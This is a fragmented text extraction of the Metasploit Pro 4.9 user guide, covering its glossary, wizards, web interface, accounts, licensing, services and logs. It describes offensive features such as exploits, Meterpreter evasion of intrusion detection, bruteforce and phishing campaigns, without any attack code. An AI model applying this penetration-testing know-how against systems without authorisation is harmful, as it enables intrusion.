Академический Документы
Профессиональный Документы
Культура Документы
Release 4.9
Table of Contents
cover-page Chapter 1: Introduction to Metasploit Pro xix 1 2 2 3 4 4 4 4 5 5 5 5 5 5 6 6 6 6 6 7 8 9 9
About Metasploit Pro Supported Operating Systems Metasploit Pro Components Metasploit Implementation Bind Shell Payload Database Discovery Scan Exploit Listener Meterpreter Modules Payload Project Reverse Shell Payload Shell Shellcode Task Vulnerability Metasploit Pro Workflow Chapter 2: Wizards
Target Profiles Configure Scan Settings Configure Exploit Settings Configure Report Settings The Phishing Campaign Wizard About the Phishing Campaign Wizard Create a Project Configure the Phishing Campaign Web Application Test Wizard Configure General Settings Configure Authentication Settings Configure Vulnerability Discovery Settings Configure Vulnerability Exploit Settings Configure Report Settings Chapter 3: Metasploit Tour
10 11 12 13 14 17 17 18 19 19 20 20 21 21 23 24 24 25 26 26 27 29 30 30 31 32 33
Access the Metasploit Web UI Supported Browsers Browser Requirements User Interface Overview Navigational Menu and Features Keyboard Shortcuts Chapter 4: Administration
Account Management Account Types Creating a User Account Changing an Account Password Resetting the Password for a User Account
ii
Deleting a User Account Setting the Time Zone Account Requirements System Management Global Settings Setting HTTP Payloads Setting HTTPS Payloads Enabling Automatic Updates Disabling Automatic Updates Automatically Enabling an HTTP Proxy for Updates Defining SMTP Settings for a Mail Server Removing Metasploit License Keys Getting a License Key Activating a License Key for the First Time Updating a License Key Performing an Offline Activation Reverting to the Previous License Key Services Restarting Metasploit Services on Windows Restarting Metasploit Services on Linux Logs Log File Locations System Updates Notification Center Accessing NotificationCenter Notification Events
34 35 36 37 37 37 38 39 39 40 40 42 44 44 45 46 47 48 50 50 50 52 52 54 55 55 55
iii
Sorting Notifications by Event Type Clearing a Notification Updating the System Updating Metasploit Offline Chapter 4: Host Management
55 56 57 58 62 63 63 64 65 65 66 68 68 70 71 71 73 74 75 75 77 78 80 81 83 83 84
Host Management Interfaces Tour of the Analysis Area Tour of the Single Host Page Viewing and Editing Host Metadata Viewing Host Metadata Editing Host Information Adding and Deleting Hosts Adding a Host to a Project Deleting a Host from a Project Adding, Editing, and Deleting Services Adding a Service to a Host Editing a Service Deleting a Service from a Host Adding, Editing, and Deleting Vulnerabilities Adding a Vulnerability to a Host Adding a Vulnerability Reference Deleting a Vulnerability Reference Deleting a Vulnerability from a Host Deleting a Vulnerability from All Hosts Adding, Editing, and Deleting Credentials Viewing Credentials for a Project Viewing Credentials for a Host
iv
Adding a Known Credential Pair Editing a Credential Pair Deleting a Credential Pair from a Host Adding, Editing, Download, and Deleting Captured Data Adding Captured Data to a Host Downloading a Captured Data File Viewing a Captured Data File Viewing All Captured Data in a Project Deleting Captured Data from a Project Chapter 5: Projects
85 87 89 91 91 93 94 95 95 96 97 97 98 98 99 100 101 102 103 104 106 109 109 112 116 117 117
About Projects Project Components Project Management Creating a Project Viewing All Projects Importing Data from Other Projects Deleting a Project Changing the Project Owner Managing User Access Setting the Network Range Restricting a Project to a Network Range Team Collaboration User Access Management Host Comments Chapter 6: Modules
Modules Types Modules Excluded from Metasploit Pro Common Module Options Running a Module Module Search Keyword Tags Module Statistics Viewing Module Statistics Module Rankings Chapter 7: Scanning
117 118 119 119 121 121 123 123 124 125 126 127 127 127 128 129 130 132 133 135 135 136 138 139 140 141 141
About Scanning Discovery Scans Data Gathered during a Discovery Scan How a Discovery Scan Works Ports Included in the Discovery Scan Supported Scan Data Types Discovery Scan Options IPv6 Addresses Virtual Host Discovery Discovery Scan Tasks Running a Discovery Scan Scanning for H.323 Conferencing Systems Defining Nmap Arguments Viewing the Results from a Scan Host Management Advanced Search Parts of a Advanced Search Query
vi
Advanced Keyword Search Examples Nested Searches Adding a Host Manually Viewing Services for a Host Viewing Host Notes Deleting a Host Viewing Captured Data Viewing Vulnerabilities Viewing Tags Importing Scan Data Viewing Exploits for Known Vulnerabilities Chapter 7: Validating Nexpose Vulnerabilities
145 146 147 149 149 149 150 150 150 150 151 152 153 153 153 154 155 157 157 168 180 180 181 186 187 187 188
Getting Started with Vulnerability Validation Methods for Validating Vulnerabilities About the Vulnerability ValidationWizard Vulnerability Validation Terminology Before YouBegin Validating Nexpose Vulnerabilities with the Vulnerability ValidationWizard Importing and Exploiting Imported Nexpose Data Scanning Nexpose Sites and Exploiting Identified Vulnerabilities Tracking Real-Time Statistics and Events for Vulnerability Validation Accessing the Findings Window The Statistics Tab The Tasks Log Tab Nexpose Exceptions The Exceptions Page Creating and Pushing Nexpose Exceptions
vii
Viewing Vulnerability Exceptions in Nexpose Validated Vulnerabilities Pushing Validated Vulnerabilities Back to Nexpose Viewing Validated Vulnerabilities in Nexpose Searching for Validated Vulnerabilities in Nexpose Chapter 8: Nexpose
192 193 193 194 196 197 198 198 199 200 200 200 204 204 205 205 205 206 207 208 208 210 210 210 212 212 213
About Nexpose Nexpose Terminology Nexpose Integration with Metasploit Nexpose Scan Before You Run a Nexpose Scan Configuring a Nexpose Console Import Nexpose Data Importing Vulnerability Data from Nexpose Excluding Hosts from a Nexpose Data Import Running a Nexpose Scan Running a Nexpose Scan with a Custom Template Purging Scan Data Passing the Hash from Metasploit Searching for Tagged Nexpose Assets Importing Nexpose Data Vulnerability Exceptions Reasons for Vulnerability Exceptions Creating a Vulnerability Exception Nexpose Asset Groups Creating a Nexpose Asset Group Automatically Tagging Assets from a Nexpose Scan
viii
Automatically Tagging Assets from a Nexpose Import Vulnerability Tracking Viewing the Vulnerability Overview Page Vulnerability Details Page Host Details Page Chapter 9: Password Cracking
213 214 214 214 215 217 218 218 226 226 227 227 228 229 229 232 232 232 233 233 233 234 235 235 235 237 238
About Password Cracking Bruteforce Attacks Running a Bruteforce Attack Running a Bruteforce Attack against a VM Running a Bruteforce Attack with a Password List Running a Bruteforce Attack with a Single Credential Importing a Password List Credential Management Supported Credential Formats Word Lists Importing a Custom Word List Selecting a Custom Word List Viewing Imported Credentials Viewing Metasploit Word Lists Deleting Imported Word Lists Chapter 10: Exploitation
About Exploitation Automated Exploits Manual Exploits Components of an Exploit Common Exploitation Tasks
ix
Searching for Exploits Running Automated Exploits Running a Single Exploit Setting Up a Listener Enabling and Disabling a Listener Stopping a Listener Chapter 11: Payloads
238 238 239 239 240 240 241 242 243 243 246 252
The Payload Generator Accessing the Payload Generator Building Dynamic Payloads Building Classic Payloads Listeners Chapter 12: MetaModules
253 254 255 255 256 256 259 261 261 261 267 267 271 271 276
About MetaModules Tour of the MetaModules Overview Page MetaModule Runs MetaModule Findings MetaModule Findings Deleting a MetaModule Run Single Password Testing MetaModule Lockout Risks Running the Single Password Testing MetaModule SSH Key Testing MetaModule Running the SSH KeyTesting MetaModule Pass the HashMetaModule Running the Pass the Hash MetaModule Known Credentials Intrusion MetaModule
Running the Known Credentials Intrusion MetaModule Segmentation and Firewall Testing MetaModule Egress Scan Target Port States Running the Segmentation and Firewall Testing MetaModule Passive Network Discovery MetaModule Running the Passive Network Discovery MetaModule MetaModule Reports Firewall Egress Testing Report Passive Network Discovery Findings Report Auth MetaModule Reports Chapter 13: Web Scans Web Application Testing Authenticated Web Scans Creating a URL Blacklist for Web Scans Enabling Secure Socket Layer Checks for Web Scans Web Audit Web Application Exploit Web Application Assessment Report Web Application Assessment Report Sections Web Application Assessment Report Engagement Scope Web Application Assessment Report Summary Graphs OWASP Top 10 Web Application Security Risk Summary Web Application Assessment Report Vulnerability Details Web Application Assessment Report Remediation Web Application Assessment Report Glossary WebApplicationTests
276 280 280 280 281 284 284 290 291 293 294 295 296 297 298 298 299 301 303 305 305 305 306 308 308 309 310
xi
Web Application Assessment Report Options Web Application Assessment Report Options Generating a Web Application Assessment Report Viewing Web Vulnerability Details Web Vulnerability Categories Vulnerability Proof Text Chapter 15: Host Tags
311 312 313 316 316 317 319 320 320 322 322 323 324 325 326 326 327 328 329 330 330 331 331 332 332 332 332
About Host Tags Components of a Host Tag Host Tag Tasks Creating a Host Tag Deleting a Host Tag Applying a Host Tag Updating a Host Tag Automatically Tagging Discovered Hosts Automatically Tagging Imported Hosts Searching for Hosts by Host Tag Chapter 16: Sessions
About Sessions Active Sessions Command Shell Session Meterpreter Sessions Authentication Notes Session Tasks Session Details Proxy Pivot VPN Pivot
xii
Virtual Interfaces VNC Sessions File Systems Chapter 17: Social Engineering
333 333 334 335 336 336 336 337 338 338 339 339 339 340 341 342 343 343 343 343 343 343 343 344 344 344 344
About Social Engineering Social Engineering for Metasploit 4.4 and Older Viewing Legacy Campaigns Generating a Report for Legacy Campaigns Social Engineering Techniques Phishing Client-Side Exploits File Format Exploits Java Signed Applets Portable Files Social Engineering Components Social Engineering Workflow Social Engineering Terminology Browser Autopwn Campaign Click Tracking E-mail Template Executable File Format Exploit Human Target Phishing Attack Portable File Resource File
xiii
Social Engineering Target List Tracking GIF Tracking Link Tracking String Visit Web Template Campaign Dashboard Campaign Tasks Bar Campaign Widgets Modal Windows Action Links Campaigns Campaign Restrictions Campaign States Campaign Management Creating a Campaign Editing the Campaign Name Running a Campaign Clearing the Data from a Campaign Viewing the Findings for a Campaign Adding a Campaign Component Removing a Campaign Component Stopping a Campaign Sending an E-mail Notification when a Campaign Starts Deleting a Campaign Exporting a CSV File of Campaign Findings
344 344 344 345 345 345 345 346 346 347 347 347 349 349 349 351 351 351 352 352 353 353 354 354 355 355 356
xiv
Exporting a CSV File of E-mail Sent from a Campaign Exporting a CSV File of Human Targets that Opened the E-mail Exporting a CSV File of Human Targets that Clicked on the Link Exporting a CSV File of Human Targets that Submitted the Form Campaign Components E-mail Web Page Portable File Reusable Campaign Resources Target Lists Templates E-mail Templates Malicious Files USB Key Campaigns Executable Files File Format Exploits Phishing Campaigns How a Phishing Campaign Works Before You Create a Phishing Campaign Creating a Phishing Attack Working with Sessions Checking for Open Sessions Cleaning Up Sessions Social Engineering Report Social Engineering Report Sections Generating a SocialEngineering Details Campaigns Report Chapter 18: Task Chains
356 356 357 357 358 358 362 369 372 372 375 377 379 383 383 385 387 387 387 388 392 392 392 393 393 404 407
xv
About Task Chains Task ChainUI Tour Supported Tasks Working with Task Chains Creating a Task Chain Adding a Task to a Task Chain Cloning a Task Rearranging Tasks in a Task Chain Adding a Post-Exploitation Module to a Task Chain Removing a Task from a Task Chain Clearing the Project Data before a Task Chain Runs Resetting a Task Chain Running a Task Chain Managing and Editing Task Chains Editing a Task Chain Cloning a Task Chain Suspending a Task Chain Updating the Schedule for a Task Chain Stopping a Running Task Chain Stopping All Running Tasks Viewing the Tasks Log Cleaning Up Open Sessions Deleting a Task Chain Task Chain Schedules Schedule Options Scheduling a TaskChain Suspending a Schedule
408 408 411 412 412 414 415 415 416 416 417 418 418 420 420 421 421 423 423 424 424 425 425 427 427 428 429
xvi
Setting the Maximum Duration for a Task Chain Chapter 19: Reports
430 432 433 433 434 434 435 438 438 443 443 444 447 449 450 451 451 452 454 454 454 455 456 456 457 457 461
About Reports Report Output Formats Reports Directory Report Logs Using the Reporting Interface Metasploit Report Types Understanding Report Types Generating, Downloading, Viewing, E-mailing, Cloning and Deleting Reports Notification Center Statuses for Reports Generating a Standard Report Generating a CustomReport Downloading a Report Viewing a Report E-mailing a Report Cloning a Report Configuration Deleting Reports Customizing Standard Reports Excluding Report Sections Excluding and Including Hosts from Reports Masking Credentials from Reports Removing Charts from Reports Including Web Page HTML in Social Engineering Reports Customizing Report Names Adding a Custom Logo to a Report Working with Custom Templates
xvii
Jasper Reports and iReport Designer Requirements for Designing Custom Templates Setting Up the Metasploit Database in iReport Designer Custom Resources Directory Uploading Templates Downloading a Custom Report Template Deleting a Custom Report Template Downloading the Example Template Exporting Data Exports Directory Export Logs Notification Center Statuses for Exports Export Types Viewing Exported Data FrequentlyAsked Questions Glossary
461 462 462 466 466 469 470 471 473 473 473 474 474 481 i x
xviii
Metasploit Pro Components on page 3About Metasploit Pro on page 2 Metasploit Pro Components on page 3 Metasploit Implementation on page 4 Metasploit Pro Workflow on page 7
Linux
l
Red Hat Enterprise Linux 5.x, 6.x - x86, and x86_64 Ubuntu Linux 8.04, 10.04, 12.04 - x86, and x86_64 BackTrack Kali
Windows
l
Metasploit Framework
An open source penetration testing and development platform that provides you with access to every module that Metasploit Pro needs to perform tasks. The Metasploit Framework contains an exploit database that provides you with the latest exploit code for various applications, operating systems, and platforms. You can leverage the power of the Metasploit Framework to create additional custom security tools or write your own exploit code for new vulnerabilities. The Metasploit team regularly releases weekly updates that contain new modules and bi-weekly updates that contain fixes and enhancements for known issues with Metasploit Pro.
Modules
A module is a standalone piece of code, or software, that extends functionality of the Metasploit Framework. Modules automate the functionality that the Metasploit Framework provides and enables you to perform tasks with Metasploit Pro. A module can be an exploit, auxiliary, payload, no operation payload (NOP), or post-exploitation module. The module type determines its purpose. For example, any module that opens a shell on a target is an exploit module.
Services
Metasploit Pro uses PostgreSQL, Ruby on Rails, and Pro Service. PostgreSQL runs the database that Metasploit Pro uses to store data from a project. Ruby on Rails runs the web Metasploit Pro web interface. Pro service, or the Metasploit service bootstraps Rails, the Metasploit Framework, and the Metasploit RPC server.
User Interface
The component that you use to interact with Metasploit Pro. To launch the user interface, open a web browser and go to https://localhost:3790.
Metasploit Implementation
Rapid7 distributes Metasploit Pro as an executable file for Linux and Windows operating systems. Download and run the executable to install Metasploit Pro on your local machine or on a remote host, like a web server. Regardless of where you install Metasploit Pro, you always access the user interface through a web browser. Metasploit Pro uses a secure connection to connect to the server or machine that runs it. If you install Metasploit Pro on a web server, users can use a web browser to access the user interface from any location. Users will need the address and port for the server that Metasploit Pro uses. By default, the Metasploit service uses port 3790. You can change the port that Metasploit uses during the installation process. So, for example, if Metasploit Pro runs on 192.168.184.142 and port 3790, users can use https://192.168.184.142:3790 to launch the user interface. If Metasploit Pro runs on your local machine, you can use localhost and port 3790 to access Metasploit Pro. For example, type https://localhost:3790 in the browser URL box to load the user interface. If you have not installed Metasploit Pro, you can download the installer from the Rapid7 website. You will need a license key to activate the product. If you do not have a license key, please contact the Rapid7 sales team at sales@rapid7.com.
Database
The database stores target host data, system logs, collected evidence, and report data.
Discovery Scan
A discovery scan is the Metasploit internal scanner that combines Nmap and several Metasploit modules to scan and fingerprint targets. If you do not have Nexpose or scan data to import into Metasploit Pro, you can run a discovery scan to gather information about the target. There are several scan speeds that you can configure for a discovery scan. The scan speed determines the method that the discovery scan uses to perform the discovery process.
Metasploit Implementation
Exploit
An exploit is a program that takes advantage of a specific vulnerability and provides an attacker with access to the target system. An exploit typically carries a payload and delivers the payload to the target system. For example, one of the most common exploits is windows/smb/s08-067_netapi, which targets a Windows Server Service vulnerability that could allow remote code execution. You can run this exploit against a machine that has the ms0-067 vulnerability to remotely take control of the system.
Listener
A listener waits for an incoming connection from either the exploited target or the attacking machine and manages the connection when it receives it.
Meterpreter
Meterpreter is an advanced multi-function payload that provides you an interactive shell. From the Meterpreter shell, you can do things like download a file, obtain the password hashes for user accounts, and pivot into other networks. Meterpreter runs on memory, so it is undetectable by most intrusion detection systems.
Modules
A module is a standalone piece of code, or software, that extends functionality of the Metasploit Framework. Modules automate the functionality that the Metasploit Framework provides and enables you to perform tasks with Metasploit Pro. A module can be an exploit, auxiliary, payload, no operation payload (NOP), or post-exploitation module. The module type determines its purpose. For example, any module that opens a shell on a target is an exploit module.
Payload
A payload is the actual code that executes on the target system after an exploit successfully executes. A payload can be a reverse shell payload or a bind shell payload. The major difference between these payloads is the direction of the connection after the exploit occurs.
Project
A project is a container for the targets, tasks, reports, and data that are part of a penetration test. A project represents the workspace that you use to create a penetration test and configure tasks. Every penetration
Exploit
Shell
A shell is a console-like interface that provides you with access to a remote target.
Shellcode
Shellcode is the set of instructions that an exploit uses as the payload.
Task
A task represents an action that Metasploit Pro can perform, such as a scan hosts, bruteforce credentials, exploit vulnerable targets, or generate a report.
Vulnerability
A vulnerability is a security flaw or weakness in an application or system that enables an attacker to compromise the target system. A compromised system can result in privilege escalation, denial-ofservice, unauthorized data access, stolen passwords, and buffer overflows.
Chapter 2:
Wizards
Metasploit Pro includes several wizards that provide a guided interface that walk you through a few of the most common tasks in penetration testing, such as a standard penetration test, phishing campaign, and web application test. To get started with one of the wizards, read the following topics:
l
Quick PenTest Wizard on page 9 About the Phishing Campaign Wizard on page 17 Web Application Test Wizard on page 19
Target Settings
Target Profiles
When you launch the Quick PenTest Wizard, it displays a list of target profiles that you can select for the test. A target profile uses the host information obtained by the scan to build an attack plan based the system and device type. There are target profiles for Windows targets, *nix servers, web servers, and network devices. If you want to exploit all systems and devices, you can use the Everything target profile. For example, if you choose the Web Servers target profile, Metasploit Pro will only exploit systems that are running an HTTP or HTTPS service and will skip systems that do not match the target profile. Note: If the test does not have any systems that match the selected target profile, it will skip the exploitation phase.
Windows Targets - Any server or client that runs any version of Windows. *nix Servers - Any server or client that runs a Linux operating system, or any server or client that runs a UNIX-like operating system or a common UNIX service, such as SSH or inetd. Web Servers - Any server that runs an HTTP or HTTPS service.
Target Profiles
10
Network Devices - Any system that is not a server or a client. These systems typically do not run a standard operating system, like Windows or Linux. Some examples of network devices are printers, faxes, and routers.
11
12
13
2. When the Phishing Campaignwindow appears, enter a name for the project. The project name can use any combination of alphanumeric characters, special characters, and spaces.
14
3. In the Address Range field, enter an address range for the project. This step is optional. Note: The address range sets the default addresses that automatically populate the Target Addresses field for Discovery Scans and Nexpose Scans. Metasploit Pro does not enforce the network address range unless you enable the network restriction option. If you want to enter multiple network ranges, use a comma to separate each one.
4. Click the Next button to launch the campaign configuration page. Now, you are ready to configure the campaign components. The first thing you should do is provide a name for the campaign. Metasploit Pro will automatically save the campaign each time you click on a widget to open a campaign component.
15
After you name the campaign, you will need to configure the e-mail and web page components. Then, you will need to define the settings for your SMTP server and web server. To configure the campaign components, click on any of the widgets on the campaign configuration form. The corresponding configuration window will open for the component that you chose.
16
Create a Project
17
18
Crawling URLs - The scan engine crawls and enumerates the web application. This process identifies the URLs and IP addresses that are available for auditing. Auditing Vulnerabilities- The scan engine identifies vulnerabilities that exist in the targeted web application, web server, and related databases. Exploiting Vulnerabilities- Metasploit Pro automatically generates an exploit map, or an attack plan, based on the vulnerabilities identified during the audit. Once the attack plan has been created, Metasploit Pro launches the relevant modules against the identified vulnerabilities and attempts to exploit the web application.
To guide you through this process. the Web Application Test Wizard provides a guided interface that helps you seamlessly set up a web application test that automatically runs each task. For each task, the wizard shows you a set of the most commonly configured options. You can customize these options or you can use the default settings. When you switch between task tabs, the wizard validates the configuration for the task. If the wizard identifies any misconfigurations, a red asterisks appears on the tab to alert you that there are settings that need to be reconfigured.
19
20
21
22
Chapter 3:
Metasploit Tour
The Metasploit Web UI is a browser-based interface that provides you with access to Metasploit Pro features. You can access the Metasploit Pro WebUI with any supported browser. This includes Internet Explorer 9+, Mozilla Firefox 4.0+, and GoogleChrome 10+. To learn more about the Metasploit WebUI, read the following topics:
l
Supported Browsers
The user interface runs on the following browsers:
l
Google Chrome 10+ Mozilla Firefox 18+ Internet Explorer 9+ Iceweasel 18+
Note: The web user interface may run on other browsers, but Metasploit Pro does not officially support those browsers.
24
Browser Requirements
You must enable Javascript so that the user interface displays and functions correctly. If you disable Javascript, some features may not be visible or available to you. For instructions on how to enable Javascript, please visit http://www.enable-javascript.com.
Browser Requirements
25
Additionally, from the Dashboard, you can view the Recent Events log to see the latest activity for the project. This is useful if you are part of a team and want to see what other members have done within the project. Ultimately, the Dashboard helps you quickly assess the data that has been collected for the project at a certain point in time. From the Dashboard, you can launch the configuration page for most tasks, such as discovery scans, Nexpose scans, data imports, web scans, bruteforce attacks, smart exploits and social engineering campaigns. The two tasks you cannot launch directly from the Dashboard are manual exploits and reports. Each task has its own configuration page that displays all the options and settings that you can define for a task. The user interface displays the fields you need to input data, check box options that you can enable or disable depending on your test requirements, and dropdown menus that provide you with available options for a particular task.
26
Main menu - Use the Main menu to access project settings, edit account information, perform administrative tasks, and view software update alerts. Project menu -Use the Project menu to create, edit, open, and view projects. Account menu - Use the Account menu to manage your account settings. You can change your password, set the time zone, and edit the contact information for the account. Administration menu - Use the Administration menu to manage system updates, license keys, user accounts, and global settings. Task bar - Use the task bar to navigate between task pages. Navigational breadcrumbs - Use the navigational breadcrumbs to switch between related task pages. Quick tasks - Use the quick tasks to access the task configuration page.
Keyboard Shortcuts
A keyboard shortcut is a method that uses a combination of keys to invoke a function inMetasploit. They make it easier and faster to interact with the web interface, which saves you time as you build and run your penetration tests. The following keyboard shortcuts are available:
Keyboard Shortcuts
27
Description
Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings. Opens the Diagnostic Console, if you have the debugging option enabled in the Global Settings. Opens the online help system. Closes or opens the selected help icon.
Keyboard Shortcuts
28
Chapter 4:
Administration
Account Management on page 30 System Management on page 37 License Keys on page 44 Services on page 50 Logs on page 52 System Updates on page 54
Account Management
A user account provides you and your team members with access to Metasploit Pro. You use a user account to log into Metasploit Pro and to create identifies for other members on the team. A user account consists of a login name, the users full name, a password, and a role. Use the following components to set up a user account:
l
Login name - The user name that the system uses to uniquely identify a person. Full name - The first and last name for the person who owns the user account. Password - An eight character string that allows access to the use account. Role - The level of access that the user has to Metasploit Pro and other projects. The role can be an administrator or basic user.
Account Types
A user account can be a non-administrator account or an administrator account. The account type determines the level of privileges that a user must have to perform certain tasks. For example, administrators have unrestricted access to the system so they can perform system updates, manage user accounts, and configure system settings. Non-administrator accounts, on the other hand, have access to Metasploit Pro, but can only perform a limited set of tasks.
Administrator Account
An administrator account has unrestricted access to all Metasploit Pro features. With an administrator account, you can do things like remove and add user accounts, update Metasploit Pro, and access all projects.
Non-Administrator Account
A non-administrator account gives a user access to Metasploit Pro, but does not provide them with unlimited control over projects and system settings.This account restricts the user to the projects that they have access to and the projects that they own. A non-administrator account cannot perform the following tasks:
l
Create or manage other user accounts. Configure global settings for Metasploit Pro. Update Metasploit Pro.
Account Management
30
Update the license key. View projects that they do have access to.
2. When the User Administration page appears, click the New User button. 3. When the New User page appears, fill out the following information to create a user account:
User name - Enter a user ID for the account. Full name - Enter the users first and last name. Password - Use mixed case, punctuation, numbers, and at least eight characters to create a strong password. Password confirmation - Re-enter the password.
4. Select the Administrator option if you want to provide the account with administrative rights. If the account has administrative privileges, the user has unrestricted access to all areas of Metasploit Pro. If the account does not have administrative rights, the user can only work with projects that they have access to and cannot update the system. 5. If the account does not have administrative rights, click the Show Advanced Options button to choose the projects that the user can access.
31
3. Click the Settings button. 4. Find the Change Password area. 5. In the New Password field, enter a password for the account. The password must contain at least eight characters and consist of letters, numbers, and at least one special character.
6. Reenter the password in the Password Confirmation field. 7. Click the Change Password button.
32
Windows
1. From the Start menu, choose All Programs > Metasploit > Password Reset. 2. When the Password Reset window appears, wait for the environment to load.
3. When the dialog prompts you to continue, enter yes. The system resets the password to a random value. 4. Copy the password and use the password the next time you log in to Metasploit Pro. You can change the password after you log in to Metasploit Pro. 5. Exit the Password Reset window.
Linux
1. Open the command line terminal and execute the following command: sudo </path/to/metasploit>/diagnostic_shell.
33
2. If prompted, enter your sudo password. 3. When the system returns the bash# prompt, enter </path/to/metasploit>/apps/pro/ui/script/resetpw to run the resetpw script.
4. Copy the password and use the password the next time you log into Metasploit Pro. You can change the password after you log in to Metasploit Pro. 5. Exit the console.
34
3. Click Delete.
35
3. Choose the time zone that you want to use. 4. Save the changes.
Account Requirements
All accounts must meet the user name and password requirements. If the user name or password does not meet one of the following criteria, Metasploit Pro displays an error until you input a user name and password that complies with every requirement.
Password Requirements
A password must meet the following criteria:
l
Contains letters, numbers, and at least one special character. Contain at least eight characters. Cannot contain the user name. Cannot be a common password. Cannot use a predictable sequence of characters
Account Requirements
36
System Management
As an administrator, you have to update and maintain Metasploit Pro to ensure that you have the latest bug fixes, features, and modules. There are a couple of ways to determine when an update is available. You can view the Product News panel to learn when the Metasploit team has released an update, or you can set up an alert that appears when an update is available to install. Additionally, as a administrator, you can configure the global settings that apply to all projects. The global settings include payload settings, mail server settings, API keys, listeners, Nexpose consoles, and Metasploit services.
Global Settings
Global settings define settings that all projects use. You can access global settings from the Administration menu. From the global settings, you can set the payload type for the modules and enable access to the diagnostic console through a web browser. Additionally, from global settings, you can create API keys, post-exploitation macros, persistent listeners, and Nexpose Consoles.
System Management
37
38
39
3. Update the settings. The settings that you define automatically fill the HTTP proxy server settings when you perform an update.
40
In order to utilize e-mail capabilities, you must have access to a local mail server or a web mail server. You need the address and port that the mail server runs on, the domain name that hosts the mail service, and the credentials for the mail server. 1. Choose Administration > Global Settings from the main menu.
Address - The address to the remote mail server. For example, use 127.0.0.1 or localhost if the mail server runs on your local machine. Port - The port that the mail server uses. The default port is 25. Domain - The fully qualified domain name that hosts the mail server. For example, use sitename.com. User Name - The user name that the system uses to authenticate the mail server. Password - The password that the system uses to authenticate the mail server. Authentication - The authentication type that the mail server uses. Choose from plain, login, and cram_md5.
41
Removing Metasploit
When you uninstall Metasploit Pro, you remove the Metasploit components and modules from the system and delete the data stored within the projects. If you remove Metasploit Pro, you will no longer be able to access or view any information that projects contain. Therefore, before you remove Metasploit Pro and its components, you should export any data that you may want to save, such as the reports and host data that you want to save.
3. Click Yes to confirm that you want to delete all saved project data. 4. Click OK when the process completes.
Removing Metasploit
42
5. Click Yes to confirm that you want to uninstall Metasploit Pro components and modules. 6. Click Yes to confirm that you want to delete the data saved in the projects. If you click No, the $INSTALLER_ROOT/apps directory remains intact, and you can continue to access the Metasploit data stored in this directory.
Removing Metasploit
43
License Keys
A license key defines the commercial edition and the registered owner of Metasploit Pro. Metasploit Pro uses the license key to identify the number of days that remain on the license and the number of users that the license key allows. Metasploit licenses are perpetual licenses, which enable you to use the application indefinitely. However, the license itself expires every year. When the license expires, you must renew the license if you want to continue to receive updates for Metasploit. You can still run Metasploit, but you can only run the last version that was released before your license key expired. To access the license key area, select Administration >SoftwareLicense from the Global Menu.
When the license key request page appears, choose whether you want to trial Metasploit Pro or obtain a Metasploit Community license key.
License Keys
44
Note: 3790 is the default port that the Metasploit service uses. If you assigned the Metasploit service to a different port during the installation process, use that port instead.
45
2. If you receive a warning about the trustworthiness of the security certificate, select that you understand the risks and want to continue to the website. The wording that the warning displays depends on the browser that you use.
3. When the web interface for Metasploit Pro appears, the New User Setup page displays if this is a first time activation. Follow the onscreen instructions to create a user account for Metasploit Pro. Save the user account information so that you can use it later to log in to Metasploit Pro. 4. After you create a user account, the Activate Metasploit page appears. Enter the license key that you received from Rapid7 in the Product Key field. Note: If you need to use an HTTP proxy to reach the Internet, you can select the HTTP proxy option and provide the information for the HTTP proxy server that you want to use.
5. Click the Activate License button. After you activate the license key, the Projects page appears.
46
47
3. When the Offline Activation window appears, browse to the location of the activation file. 4. Select the activation file. 5. Click Activate Product to complete the activation.
2. If the system detects that there is a previous license key, you will see the Revert to Previous License area. Click Revert License. The License Details window appears after the system successfully reverts to the previous license key.
48
49
Services
If you attempt to launch Metasploit Pro, and you receive the Metasploit is initializing message," you may need to restart the Metasploit services. This error typically occurs after you install or update Metasploit Pro. If you have recently installed Metasploit Pro, you may need to wait a few minutes for it to load after the installation completes. If it has been more than fifteen minutes since the installation finished, you should restart the Metasploit services. If you recently updated Metasploit Pro, the services were automatically restarted after the update completed. You should wait a few minutes to see if the Metasploit services start up again. If they do not, you should manually restart the services.
Services
50
4. Enter your sudo password when the system prompts you for it. After you enter the sudo password, the system stops and restarts all services associated with Metasploit. This includes prosvc, thin, and PostgreSQL. After the system restarts the services, wait a few minutes before you access the Metasploit Web Interface.
51
Logs
Metasploit Pro stores system events in log files. You can use the information in the log files to troubleshoot issues with Metasploit Pro. For example, if you need to troubleshoot an issue with updates, you can view the license log to see a list of events related to product activation, license keys, and updates. Please note that log files can become large over time. To reduce the amount of disk space the log files consume, regularly review and clear log files. Use the following log files to troubleshoot issues with Metasploit Pro:
l
Framework log - Details information about loading the Metasploit Framework. Use this log to troubleshoot issues with modules. License log - Details product licensing, and product updates. Use this log to troubleshoot problems that you may have with applying a license key or installing an update. PostgreSQL log - Details the start up and shutdown notices. Use this log to troubleshoot SQL query bugs and to understand the current state of the database. Production log - Details all Rails actions, such as the refresh data and routing errors. Use this log to troubleshoot Rails issues and to trace the actions that were taken for a particular connection. Pro service error log - Details errors for the Metasploit Pro service engine. Use this log to troubleshoot errors with the Metasploit service. Thin log - Details the location of the PID file. Use this log to diagnose issues between Rails and Nginx. Web server error log - Details Nginx errors. Use this log to determine if an issue is related to Nginx rather than Rails or Pro Service. Web server access log - Details every GET and POST request to Nginx and logs successful HTTP requests. Use this log to track down Rails issues.
Frameworklog - $INSTALL_ROOT/apps/pro/engine/config/logs/framework.log License log - $INSTALL_ROOT/apps/pro/engine/license.log Productionlog - $INSTALL_ROOT/apps/pro/ui/log/production.log Pro service log - $INSTALL_ROOT/apps/pro/engine/prosvc.log Tasks log - $INSTALL_ROOT/apps/pro/engine/tasks
Logs
52
Thin log - $INSTALL_ROOT/apps/pro/ui/log/thin.log Web server error log - $INSTALL_ROOT/apache2/logs/error_log Web server access log - $INSTALL_ROOT/apache2/logs/access_log
53
System Updates
In order to keep your copy of Metasploit Pro up to date with the latest fixes, enhancements, and modules, you need to install system updates when they are available. When there is a new update available, Metasploit Pro flashes a real-time alert in the Main menu. The Metasploit team typically releases weekly updates, so you need to update Metasploit Pro regularly to get the latest code base. Note: If you do not see update alerts, you will need to change the system settings to allow the alerts to display.
System Updates
54
Notification Center
Notification Center is the notification system for Metasploit Pro that alerts you when a task completes or when a software update is available. It displays as a dropdown banner from the Global Menu and provides a unified view of system-wide alerts for all projects. The Notification Center icon displays the total number of new alerts that are available. All new notifications are highlighted with a green bar. You can click on a notification to access the associated page in the user interface. Most task and MetaModule notifications will take you to the Task log. All system notifications will take you to the Software Updates page.
Accessing NotificationCenter
To access Notification Center, click on the notification icon in the upper-right hand corner of the Global Menu.
Notification Events
